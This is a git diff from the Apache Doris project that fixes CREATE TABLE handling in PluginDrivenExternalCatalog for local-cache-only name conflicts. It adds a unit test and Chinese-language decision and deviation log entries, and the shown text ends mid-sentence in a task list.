plan-doc/tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index 1f028e151a0aa3..211c7600e1963b 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -19,6 +19,8 @@ import org.apache.doris.catalog.Env; import org.apache.doris.common.DdlException; +import org.apache.doris.common.ErrorCode; +import org.apache.doris.common.ErrorReport; import org.apache.doris.common.UserException; import org.apache.doris.connector.ConnectorFactory; import org.apache.doris.connector.ConnectorSessionBuilder; @@ -290,16 +292,26 @@ public boolean createTable(CreateTableInfo createTableInfo) throws UserException // short-circuit (Env.createTable contract: return true when the table already exists), so a // "CREATE TABLE IF NOT EXISTS ... AS SELECT" does NOT fall through to an INSERT into the // pre-existing table. The table name is intentionally NOT remote-resolved (legacy parity). - boolean exists = metadata.getTableHandle(session, db.getRemoteName(), - createTableInfo.getTableName()).isPresent() - || db.getTableNullable(createTableInfo.getTableName()) != null; - if (exists && createTableInfo.isIfNotExists()) { - LOG.info("create table[{}.{}.{}] which already exists; skipping (IF NOT EXISTS)", - getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); - return true; + boolean remoteExists = metadata.getTableHandle(session, db.getRemoteName(), + createTableInfo.getTableName()).isPresent(); + boolean localExists = db.getTableNullable(createTableInfo.getTableName()) != null; + if (remoteExists || localExists) { + if (createTableInfo.isIfNotExists()) { + LOG.info("create table[{}.{}.{}] which already exists; skipping (IF NOT EXISTS)", + getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); + return true; + } + // !IF NOT EXISTS: a table present ONLY in the local FE cache (folded onto an existing name + // under lower_case_meta_names while the case-sensitive remote has no such table) must be + // rejected HERE -- connector.createTable would otherwise CREATE it remotely instead of + // failing. Mirrors legacy PaimonMetadataOps.performCreateTable:206-214 (local arm). A + // remote-only conflict still falls through to connector.createTable, which throws + // "already exists" -> DdlException (unchanged). + if (localExists) { + ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, + createTableInfo.getTableName()); + } } - // existing + !IF NOT EXISTS falls through to connector.createTable, which throws - // "already exists" -> DdlException (unchanged); only the IF NOT EXISTS hit short-circuits. ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter .convert(createTableInfo, db.getRemoteName()); try { diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java index 09c6eaf0030852..7494eb972dbc2e 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java @@ -551,6 +551,42 @@ public void testCreateTableExistingTableWithoutIfNotExistsStillErrors() throws E } } + @Test + public void testCreateTableLocalConflictWithoutIfNotExistsRejects() throws Exception { + // Remote says ABSENT (getTableHandle empty) but the FE cache HAS the table -- the local arm of the + // legacy remote-then-local probe (PaimonMetadataOps.performCreateTable:206-214). Under + // lower_case_meta_names a case-variant name folds onto an existing local table while the + // case-sensitive remote has no such table. Legacy throws ERR_TABLE_EXISTS_ERROR here; the bridge + // must NOT fall through to metadata.createTable, which would CREATE a duplicate remote table + // (silent metadata corruption). + ExternalDatabase db = mockExternalDatabase(); + Mockito.when(db.getRemoteName()).thenReturn("DB1"); + Mockito.doReturn(Mockito.mock(ExternalTable.class)).when(db).getTableNullable("t1"); + catalog.dbNullableResult = db; + Mockito.when(metadata.getTableHandle(session, "DB1", "t1")).thenReturn(Optional.empty()); + + try (MockedStatic conv = + Mockito.mockStatic(CreateTableInfoToConnectorRequestConverter.class)) { + ConnectorCreateTableRequest req = Mockito.mock(ConnectorCreateTableRequest.class); + conv.when(() -> CreateTableInfoToConnectorRequestConverter.convert(Mockito.any(), Mockito.any())) + .thenReturn(req); + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getDbName()).thenReturn("db1"); + Mockito.when(info.getTableName()).thenReturn("t1"); + Mockito.when(info.isIfNotExists()).thenReturn(false); + + // WHY (Rule 9 / Rule 12): a local-ONLY conflict without IF NOT EXISTS must be REJECTED at the FE + // level (ERR_TABLE_EXISTS_ERROR), never handed to connector.createTable. The pre-fix code + // consumed the existence probe only in the IF NOT EXISTS branch and fell through here, calling + // metadata.createTable -> created a duplicate remote table. Mutation (drop the localExists + // guard) -> no throw + createTable called -> both assertions go red. + DdlException ex = Assertions.assertThrows(DdlException.class, () -> catalog.createTable(info)); + Assertions.assertTrue(ex.getMessage().contains("already exists")); + Mockito.verify(metadata, Mockito.never()).createTable(Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateTable(Mockito.any()); + } + } + // ==================== helpers ==================== @SuppressWarnings("unchecked") diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 9ac37201e1e4c6..6a2ef8720564b6 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-056 | P3-fix | **FIX-CREATE-TABLE-LOCAL-CONFLICT(P3 覆盖缺口核查揪出的真分歧,MAJOR correctness)= fix-now(用户签字,2026-06-12)+ Option-2 外科最小修(仅补 local-conflict 闸,不动 remote-hit 路)**:P3「去查」对抗 review(`wf_25450c36-b7a`,4 项 plugin-vs-legacy paimon parity;tracer→对抗 verifier→completeness critic)3 项 PARITY_HOLDS(HMS-CONFRES:key 拼写恰 `hive.conf.resources` 无 `config.resources` 别名、round-1 wiring 在、BE-downflow 两侧同——legacy HMS hive-site.xml 本就不入 BE scan props;ANALYZE/列统计:`getColumnStatistic` 两侧 `Optional.empty()`、`createAnalysisTask` byte-同;split-count:post-sub-split 数经共享父 `FileQueryScanNode.selectedSplitNum` 喂 `SqlBlockRuleMgr` 两侧同,2 项 cosmetic/NIT 且 pre-date #9),唯 DDL 写揪出真分歧:通用 fe-core 桥 `PluginDrivenExternalCatalog.createTable` 把 legacy `PaimonMetadataOps.performCreateTable:182-214` 的**有序双探**(先 remote `tableExist:190` 后 local `getTableNullable:206`,任一命中+`!IF NOT EXISTS`→`ERR_TABLE_EXISTS_ERROR` 1050)**合并成单 `exists` OR**(`:293-295`),且 `exists` **只被 IF NOT EXISTS 臂消费**(`:296`)→`!IF NOT EXISTS` 臂(`:303-309`)忽略它无条件调 `metadata.createTable`。后果:**local-cache 命中但 remote 缺**(`lower_case_meta_names` 下 case-variant 折叠到既有本地表、case-sensitive remote 无此表)+`!IF NOT EXISTS` 时,legacy 报 1050 拒绝、plugin **静默在 remote 建重复表**(元数据腐败)。触发窄+backend-dependent(filesystem/jdbc case-sensitive 才中;HMS 小写化两侧都拒)但 silent correctness。**通用桥**(paimon+MaxCompute+未来 iceberg/hudi 共用)→修一处跨连接器收口。**修=纯 fe-core 桥、零 SPI/连接器/BE**:单 OR 拆回 `remoteExists`/`localExists` 两臂,`!IF NOT EXISTS` 下 `localExists`→`ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR,name)`(legacy local 臂逐字);remote-only 仍 fall-through 连接器抛(case-A 不动、既有 intentional 测绿)。**否决 Option 1 full-parity**(对整 `exists&&!ifNotExists` retype 1050)——改非分歧 case-A+破既有测+越界;case-A error-code-generic 是 pre-existing 跨全 DDL op cosmetic 残留=[DV-034]。守门:fe-core `PluginDrivenExternalCatalogDdlRoutingTest` **fail-before 恰 1 新测红**("Expected DdlException…nothing was thrown")→**pass-after 26/0/0**、checkstyle 0。真值闸=live-e2e(`lower_case_meta_names=1`+case-variant CREATE 无 IF NOT EXISTS 于 case-sensitive paimon catalog;既有 legacy paimon DDL regression 覆盖契约、本 fix 无 BE 改)。设计 [`P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md`](./tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md) | 2026-06-12 | ✅ | | D-055 | P5-fix#9 | **FIX-NATIVE-SUBSPLIT(M-3,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now(用户签字,2026-06-12)+ 纯连接器零 SPI/零 fe-core**:翻闸后大 native ORC/Parquet paimon 文件得**一个** scanner(无文件内并行)——连接器 native 臂每 RawFile 发**一个** `PaimonScanRange`(`.start(0).length(file.length())`),legacy `PaimonScanNode:434-465` 经 `determineTargetFileSplitSize`+`fileSplitter.splitFile` 把大文件切成多 split。结果正确仅并行度回归。recon(5-scout + 对抗 synthesizer `wf_ad764bf6-1c9`)三大结论:① **真 gap 非 no-op**——ORC/Parquet `compressType=PLAIN`(`FileSplitter:115`),`(!splittable||!=PLAIN)` 闸不触发→真切分跑;② **DV×sub-split 安全无须 guard**——paimon DV rowid 是文件**全局**行位置,BE native reader 在部分 byte range 内仍报全局行位(ORC `getRowNumber()` 由 stripe 起播种、Parquet `first_row` 跨 row-group 累计),`_kv_cache` 按 `path+offset` 跨 sub-split 共享 DV 位图,iceberg 用同机制于常规切分文件→**规则=同一 per-RawFile DeletionFile 原样附到每个 sub-range、不 re-base offset**(legacy `:459-460` parity);③ **纯连接器**——切分 math 是对 5 个 session var(`VariableMgr.toMap` 通道,同 `isCppReaderEnabled`)的 long 算术,连接器禁 import fe-core `FileSplitter`/`SessionVariable` 故逐字重述;`start/length/fileSize` 经既有 `PaimonScanRange.Builder`→`PluginDrivenSplit` FileSplit ctor→`FileQueryScanNode.createFileRangeDesc` 已序列化到 BE。**仅 specified-size 分支可达**(连接器传 blockLocations=null + target 恒>0 因 paimon 非 batch;block-based 分支死)。**修=纯连接器**:2 纯静态(`computeFileSplitOffsets` 逐字移植含 **`>1.1D` 尾吸收 guard**、`determineTargetSplitSize` 移植 determineTargetFileSplitSize+applyMaxFileSplitNumLimit 略去 isBatchMode→0)+ `sessionLong`/`resolveTargetSplitSize`(lazy once)+ native 臂改 buildNativeRange 加 (start,length) 内层 loop。守门:连接器 256/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before 恰 3 splitting 测红**(neuter `computeFileSplitOffsets`→单 range)其余绿、end-to-end append-only 真表小 file_split_size→≥2 contig sub-range。split-weight 调度 nicety 不移植(pre-existing native 路已缺)= [DV-033]。真值闸=live-e2e 大文件并行 + DV-file 多 range 读(既有 legacy paimon regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) | 2026-06-12 | ✅ | | D-054 | P5-fix#8 | **FIX-COUNT-PUSHDOWN(M-2,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now + 新增 default `planScan` 7-arg overload 携 `boolean countPushdown` + 连接器 collapse-to-one(用户签字,2026-06-12)**:翻闸后 plugin-driven paimon `COUNT(*)` **结果正确但慢**——COUNT 枚举已达 BE(`FileScanNode.toThrift:90` 发 `pushDownAggNoGroupingOp`、`PhysicalPlanTranslator:873` 在 plugin 节点设 COUNT、未排除)且 per-range emit 缝**已建全**(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`,与 legacy `PaimonScanNode:303-308` byte-一致),唯独**信号+计算**缺:merged count `DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算,而 COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、`PluginDrivenScanNode.getSplits` 从不读(grep 0)也不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 连接器每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`),PK/MOR merge 表尤贵。**故非纯连接器(更正动手前 framing)**:信号须过 SPI 边界。**否决经 `ConnectorSession` 穿**(FIX-FORCE-JNI 先例)——agg-op 是 per-query planner 输出非 SET-var,会成静默无类型通道(本项目反复踩的 bug 类)。**用户定(vs defer)= fix-now**,且 **count-split 形状 = 连接器 collapse-to-one**(vs full-parity fe-core trim / vs per-split)。**修=3 文件**:① SPI `ConnectorScanPlanProvider` +1 **default** 7-arg `planScan(...,boolean countPushdown)` 委托 6-arg(镜像 limit/requiredPartitions 扩展链,其余连接器零改 no-op)[E15];② fe-core `PluginDrivenScanNode.getSplits` 读 `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` 传入(**无 post-loop 数学**);③ 连接器抽 `planScanInternal(...,countPushdown)`(4-arg 委托 false、7-arg 委托 flag)+ count 短路(**第一 routing 臂**,count-eligible split 不再发数据 range,否则 BE 双计 vs DV/PK-merge):累加全 eligible split 的 `mergedRowCount` 入 `countSum`、留首个为代表、循环后发**一** JNI count range 携 `countSum`(=legacy `<=10000` singletonList+assignCountToSplits 收一 split case);无 merged count 的 split 走常规 native/JNI 路 BE 自计(footer/物化)。两新成员=纯静态 `isCountPushdownSplit(boolean,DataSplit)`(mutation-test 路由闸)+ `buildCountRange`。**参数形状 `boolean`**(BE 只需 COUNT-vs-not、`TPushAggOp` 过度泛化)+ **paimon-only**=工程判断(未被否)。legacy `>10000` 并行 split trim **有意丢**(连接器无 numBackends,fe-core-only)= perf-only 偏差 [DV-032]。守门:连接器 252/0/0(1 CI-gated skip)、fe-core compile+checkstyle 0、import-gate 净、**fail-before 恰 2 新测红**(neuter `isCountPushdownSplit`→false)其余 33 绿、end-to-end 真 local PK 表测断言 collapse-to-one 携 merged total(2)。真值闸=live-e2e BE CountReader 选择/EXPLAIN(既有 legacy paimon count regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) | 2026-06-12 | ✅ | | D-053 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-8(MAJOR,Kerberos-only,fe-core,filesystem+jdbc)= fix-now(用户签字,2026-06-11)**:翻闸后 filesystem/jdbc flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog` 已把建 catalog 包进 `context.executeAuthenticated`(:194),但其背后 authenticator 对这两 flavor 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()` 内构建(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`),而 `initializeCatalog` 在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`;plugin 路径经 `PaimonCatalogFactory` 自建 catalog)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` 的 no-op → `executeAuthenticated` 不 doAs。HMS 不受影响(authenticator 在 `initNormalizeAndCheckProps:70` 即建、必跑)。**作用域=filesystem+jdbc only**(用户签):DLF/REST 排除——`PaimonAliyunDLFMetaStoreProperties` 从不设 authenticator、用 Aliyun AK/SK/STS 入 HiveConf 非 Kerberos UGI(无 doAs 可丢),故 review「DLF」从句 **overstated**;HMS 已对。**修=fe-core,零连接器改/零连接器-SPI**:新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用**已安全建好**的 `catalogProperty.getOrderedStoragePropertiesList()` 调(catalog-init 时机、与 legacy 同、避免每次 `MetastoreProperties.create` eager 重复 kerberos login);filesystem/jdbc override 之经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 从 HDFS `StorageProperties` 建 authenticator(镜像 HMS)。**FE-unit 可测 wiring**(断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator`、不调 initializeCatalog),**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos regression 套件,[DV-031](./deviations-log.md))。守门:fe-core `Paimon{FileSystem,Jdbc}MetaStorePropertiesTest` 14/0/0、fail-before 双 red(no-op `AbstractPaimonProperties$1`)、checkstyle 0。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | @@ -67,6 +68,16 @@ ## 详细记录(时间倒序) +### D-056 — `FIX-CREATE-TABLE-LOCAL-CONFLICT`(P3 揪出,MAJOR correctness)= fix-now + Option-2 外科最小修 + +- **日期**:2026-06-12 +- **状态**:✅ 生效 +- **关联**:[task-list §P3](./task-list-P5-rereview2-fixes.md)、[设计](./tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md)、[DV-034](./deviations-log.md)、P3 对抗 review `wf_25450c36-b7a` +- **背景**:P3 覆盖缺口核查(「去查」非「去改」)的 4 项 plugin-vs-legacy paimon parity 中,3 项 PARITY_HOLDS(HMS-CONFRES:key 拼写恰 `hive.conf.resources`、无 `config.resources` 别名、round-1 wiring 在、BE-downflow 两侧同——legacy HMS hive-site.xml 本就不入 BE scan props;ANALYZE/列统计:`getColumnStatistic` 两侧 `Optional.empty()`、`createAnalysisTask` byte-同、generic 于桥非 paimon regression;split-count:post-sub-split 数经共享父 `FileQueryScanNode.selectedSplitNum` 喂 `SqlBlockRuleMgr` 两侧同、2 项 cosmetic/NIT 且 pre-date #9),唯 DDL 写揪出真分歧:对抗 verifier 把 tracer 的 createTable PARITY 推翻为 DIVERGENCE——通用桥 `PluginDrivenExternalCatalog.createTable` 丢了 legacy `PaimonMetadataOps:206-214` 的 local-arm 拒绝(详见 §索引 D-056 正文)。 +- **决策**:用户签字 **convert-to-FIX now**(vs log-as-deviation / investigate-more)。实现取 **Option 2 外科最小修**:仅补 local-conflict 闸,case-A(remote-hit)行为不动。 +- **替代方案**:Option 1 full-parity(对 `exists&&!ifNotExists` 全 retype 1050)——否决:改非分歧 case-A + 破既有 intentional 测(`testCreateTableExistingTableWithoutIfNotExistsStillErrors` 钉 remote-hit→连接器抛 generic)+ 越 finding 界。 +- **影响**:fe-core `PluginDrivenExternalCatalog.java`(拆 OR + 加 guard、+2 import `ErrorCode`/`ErrorReport`)+ test(+1)。零 SPI/连接器/BE/RFC。**通用桥修跨连接器收口**(MaxCompute/未来 iceberg/hudi 同受益,呼应 P3 item-5 跨连接器 follow-up)。残留 case-A error-code-generic = [DV-034] 留 P4 cleanup。 + ### D-055 — `FIX-NATIVE-SUBSPLIT`(#9 M-3)= 连接器侧移植 native 文件切分(纯连接器,零 SPI/零 fe-core) - **日期**:2026-06-12 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index ed1197eac90274..38c35214775493 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,11 @@ ## 📋 索引 -> 时间倒序;当前共 **31** 项。 +> 时间倒序;当前共 **32** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-034 | P3-fix FIX-CREATE-TABLE-LOCAL-CONFLICT:**plugin DDL op 把 typed MySQL error-code 收敛成 generic `DdlException`**(pre-existing 跨全 4 DDL op,P4 cleanup defer)。`FIX-CREATE-TABLE-LOCAL-CONFLICT`([D-056])仅恢复 createTable 的 **case-B correctness**(local-only 冲突 + `!IF NOT EXISTS`→改抛 typed `ERR_TABLE_EXISTS_ERROR` 1050),**未** retype:**case-A**(createTable remote-hit + `!IF NOT EXISTS`)仍 fall-through 由连接器(paimon `TableAlreadyExistException`)→`DorisConnectorException`→桥 re-wrap 成 generic `DdlException`「already exists」,legacy `PaimonMetadataOps:195` 在 FE 层先抛 typed 1050;**createDatabase/dropDatabase/dropTable** 同样 `catch(Exception)`→generic `DdlException`(`PaimonConnectorMetadata:731/798/832/756`+桥 re-wrap),collapse 掉 legacy 1007/1008/1109。**非本 P3 finding**(finding=case-B silent-create correctness)、P3 audit 标 error-code parity=cosmetic/AGREE(error class + user-visible「already exists」文本两侧同、仅 numeric code 丢)。修它须每 op 在桥/连接器边界统一 typed-code 透传,属跨全 op + 跨连接器(hudi/iceberg 同)的 **P4 cleanup 批量**。真值闸=无功能影响,仅 MySQL numeric-error-code-sensitive 客户端脚本理论可感知 | [task-list §P3/§P4](./task-list-P5-rereview2-fixes.md) / [D-056](./decisions-log.md) | 2026-06-12 | 🟢 已登记(cosmetic/error-code-only,pre-existing 跨全 DDL op;P4 cleanup defer)| | DV-033 | P5-fix#9 FIX-NATIVE-SUBSPLIT:**split-weight / target-size 调度 nicety 不移植**(用户签字采纯连接器实现,2026-06-12)。legacy `fileSplitter.splitFile` 经 `splitCreator.create(...,targetFileSplitSize,...)` 在每个 `FileSplit` 上设 split weight + targetSplitSize,供 `FederationBackendPolicy` 做 backend 分配均衡。连接器 native sub-range(`buildNativeRange`)**不设** `selfSplitWeight`/targetSplitSize——但这是 **pre-existing**:翻闸后单-range native 路本就没设(`buildNativeRange` 从未设 weight,仅 JNI 路 `buildJniScanRange` 经 `computeSplitWeight` 设)。#9 **不引入**该缺口,只是把一个整文件 range 变成多个 sub-range(并行度本身已恢复,这是 #9 的目的)。纯调度均衡质量、非正确性、非并行度。连接器 SPI 无 per-range weight 喂入 FileSplit 的通道(`PaimonScanRange` 无 targetSplitSize 字段)。跨连接器:hudi/iceberg full-adopter 若要 weight-均衡可后续在 SPI/`PaimonScanRange` 加 weight 字段批量补(与既有 native-path weight 缺口一并)。真值闸=live-e2e(观察 backend 分配均衡,非正确性) | [task-list #9](./task-list-P5-rereview2-fixes.md) / [P5-fix-NATIVE-SUBSPLIT 设计](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) / [D-055](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf/调度-only,pre-existing;live-e2e 真值闸)| | DV-032 | P5-fix#8 FIX-COUNT-PUSHDOWN:**collapse-to-one 丢 legacy `>10000` 并行 count-split trim**(用户签字采 collapse-to-one,2026-06-12)。legacy `PaimonScanNode:484-495` 收齐 count-eligible split 后按 `pushDownCountSum` 分流——`>COUNT_WITH_PARALLEL_SPLITS(10000)` 时 trim 到 `parallelExecInstanceNum * numBackends` 个 split 并 `assignCountToSplits` 把 total 均摊(BE 每 split CountReader 再求和回 total);`<=10000` 则 `singletonList(first)` 收一 split 携全 total。连接器**始终 collapse-to-one**(无论 countSum 大小),因连接器无 `numBackends`/`parallelExecInstanceNum`(fe-core scan-node-only,`getSplits(int numBackends)` 才有)。**纯 perf 偏差、结果恒等**:单 CountReader 在一个 fragment emit `countSum` 个空行(无 IO)而非 N 个并行——对超大 count 不并行化 count-emit。CountReader 不读数据故影响小。**未采 full-parity**(连接器发 per-split + fe-core 按 numBackends trim+redistribute)以避免把 count 语义耦进通用 `ConnectorScanRange` + 多 fe-core 代码。跨连接器:hudi/iceberg full-adopter 若要 `>10000` 并行可后续在 fe-core 加 trim hook(与 [DV-028]/[DV-030]/[DV-031]「新连接器读法 vs fe-core 既有约定」类缝同批考量)。真值闸=live-e2e(超大 PK 表 `COUNT(*)` 仍正确、仅观察 fragment 并行度差异) | [task-list #8](./task-list-P5-rereview2-fixes.md) / [P5-fix-COUNT-PUSHDOWN 设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) / [D-054](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf-only,结果恒等;live-e2e 真值闸)| | DV-031 | P5-fix#6 FIX-KERBEROS-DOAS 两接受项:① **真 doAs 端到端 = live-Kerberos-e2e only**——M-8(filesystem/jdbc over Kerberized HDFS)+ M-11(Kerberos HMS read RPC)的 FE-unit 测只覆盖 **wiring**(M-8 断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator` 类型、不调 initializeCatalog;M-11 用 `RecordingConnectorContext.failAuth`/`authCount` 断言 read 经 `executeAuthenticated`),**无 paimon-kerberos regression 套件**(现有 `regression-test/.../kerberos/` 4 套仅 hive+iceberg、gated by `enableKerberosTest`)→ 真 KDC doAs 留给 live-e2e 门(翻闸前必验)。fail-safe:非 Kerberos 部署 no-op authenticator 与真 authenticator 行为一致(`ExecutionAuthenticator.execute`=`task.call()`)、无回归。② **跨连接器 follow-up**:read-vs-DDL doAs 缺口(M-11)+ 翻闸-authenticator-wiring 缺口(M-8,`initializeCatalog` 死代码)在 hudi/iceberg full-adopter **同样复发**(`cutover-fe-dispatch-gap` 姊妹);与 [DV-028](#4 CREATE-time-only 校验)/[DV-030](#5 mapping-flag 键)同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,将来可批量 close。**M-8 新增 fe-core `MetastoreProperties.initExecutionAuthenticator` hook 是 fe-core 内部扩展、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改)→ 01-spi-extensions-rfc.md 无须改 | [task-list #6](./task-list-P5-rereview2-fixes.md) / [P5-fix-KERBEROS-DOAS 设计](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) / [D-052](./decisions-log.md) / [D-053](./decisions-log.md) | 2026-06-11 | 🟢 已登记(live-e2e 真值闸 + 跨连接器 follow-up)| @@ -55,6 +56,16 @@ ## 详细记录(时间倒序) +### DV-034 — P3-fix FIX-CREATE-TABLE-LOCAL-CONFLICT:plugin DDL op typed error-code 收敛成 generic DdlException(COSMETIC/error-code-ONLY,pre-existing 跨全 DDL op) + +`FIX-CREATE-TABLE-LOCAL-CONFLICT`([D-056](./decisions-log.md))恢复了 createTable 的 case-B **correctness**(local-only 冲突 + `!IF NOT EXISTS` 改抛 typed `ERR_TABLE_EXISTS_ERROR` 1050),但**有意不动** error-code 残留: + +- **case-A(createTable,remote-hit + `!IF NOT EXISTS`)**:plugin 仍 fall-through 到 `metadata.createTable`,由连接器(paimon SDK `TableAlreadyExistException`)→`DorisConnectorException`→桥 re-wrap 成 **generic `DdlException`(e.getMessage())**「Table 't1' already exists…」;legacy `PaimonMetadataOps:195` 在 FE 层先抛 **typed** `ERR_TABLE_EXISTS_ERROR`(1050)。outcome(拒绝 + 「already exists」文本)同,仅 numeric code 丢。 +- **createDatabase/dropDatabase/dropTable**:同样 `catch(Exception)`→generic `DdlException`(`PaimonConnectorMetadata:731/798/832/756` + 桥 re-wrap),collapse 掉 legacy 的 1007/1008/1050/1109 typed code。 +- **为何不在本 fix 收口**:① 非本 P3 finding(finding=case-B silent-create correctness);② P3 audit 把 error-code parity 标 **cosmetic/AGREE**(error class + user-visible 文本两侧一致);③ 修它须对每 DDL op 在桥/连接器边界统一 typed-code 透传机制,属跨全 op + 跨连接器(hudi/iceberg full-adopter 同)的 **P4 cleanup 批量**,非外科单点。 +- **真值闸**:无功能影响;仅对 MySQL numeric-error-code-sensitive 的客户端脚本理论可感知。 +- **跨连接器**:与 [DV-028]/[DV-030]/[DV-031] 同属翻闸后通用桥/连接器边界的语义收敛,将来批量 close。 + ### DV-033 — P5-fix#9 FIX-NATIVE-SUBSPLIT:split-weight / target-size 调度 nicety 不移植(PERF/调度-ONLY,pre-existing) - **发现日期**:2026-06-12 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 252793d7c424af..65d0ac6976677d 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -120,14 +120,21 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done --- -## P3 — Coverage gaps to verify/close (completeness critic; NOT confirmed bugs) +## P3 — Coverage gaps **VERIFIED** (2026-06-12; adversarial audit `wf_25450c36-b7a`: tracer → adversarial verifier → completeness critic) -> These are "go check", not fixes. Convert to a FIX-task only if a real divergence is found. +> "Go check, not fix." Result: **3/4 PARITY_HOLDS; 1 real divergence → converted to FIX** (user-signed, [D-056](./decisions-log.md)). -- **VERIFY FIX-HMS-CONFRES**: round-2 did **not** re-test `hive.config.resources` / hive-site.xml downflow into BE-facing scan props (the round-1 MAJOR's fix). Confirm it reaches `getScanNodeProperties` for HMS/DLF. -- **TRACE DDL write parity**: `PaimonConnectorMetadata.createTable/dropTable/createDatabase/dropDatabase` (`:683-797`) vs legacy `PaimonMetadataOps`; branch/tag DDL write (`ExternalCatalog.java:1427-1513`); IF-(NOT-)EXISTS short-circuit, editlog/cache-refresh ordering, error-code parity. -- **TRACE ANALYZE / column-stats**: `ExternalAnalysisTask` / `getColumnStatistic` parity (fetchRowCount itself already confirmed faithful). -- **CHECK split-count accounting** under lost splitting (`SqlBlockRuleMgr` limits, batch-mode) — ties to #9. +- ✅ **VERIFY FIX-HMS-CONFRES — PARITY_HOLDS**: key spelling is exactly `hive.conf.resources` (NO `hive.config.resources` alias in fe-core/fe-common — the suspected MAPPING-FLAG-KEYS-class bug **refuted**; `HMSBaseProperties.java:58`, exact `props.get`); round-1 wiring present (`ConnectorContext.loadHiveConfResources` default-empty, `DefaultConnectorContext:140-153` reuses `CatalogConfigFileUtils.loadHiveConfFromHiveConfDir`, `buildHmsHiveConf` base-seed, `PaimonConnector` HMS branch); HMS-only (DLF parity: legacy `PaimonAliyunDLFMetaStoreProperties:73-84` builds a fresh HiveConf, no file load). **BE-downflow** (the part round-2 never tested): legacy HMS hive-site.xml keys do **NOT** reach BE scan props (legacy `getLocationProperties` = StorageProperties-derived only; `getBackendPaimonOptions` JDBC-only); plugin mirrors exactly (`PaimonScanPlanProvider:546-549/897`) + serializes the table from the same hive-conf-resources-built catalog. No divergence. +- 🔴 **TRACE DDL write parity — 1 REAL_DIVERGENCE (MAJOR) → FIXED** (see **P3-fix** below). Other 6 aspects parity/NIT: dropTable/createDatabase/dropDatabase IF-(NOT-)EXISTS + FORCE/cascade (enumerate-loop AND native cascade) match; branch/tag DDL rejected on BOTH sides (no production `PluginDrivenExternalCatalog` subclass overrides them → base throws `DdlException` "not 